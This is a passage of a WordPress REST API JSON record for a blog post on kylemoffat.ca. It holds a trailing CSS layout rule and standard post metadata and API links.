type=\"text\/css\">.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-top : 0px;margin-top : 0px;padding-right : 30px;padding-bottom : 0px;margin-bottom : 0px;padding-left : 30px;}<\/style><\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":378,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[15],"acf":[],"_links":{"self":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts\/533"}],"collection":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/comments?post=533"}],"version-history":[{"count":2,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts\/533\/revisions"}],"predecessor-version":[{"id":535,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts\/533\/revisions\/535"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/media\/378"}],"wp:attachment":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/media?parent=533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/categories?post=533"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/tags?post=533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}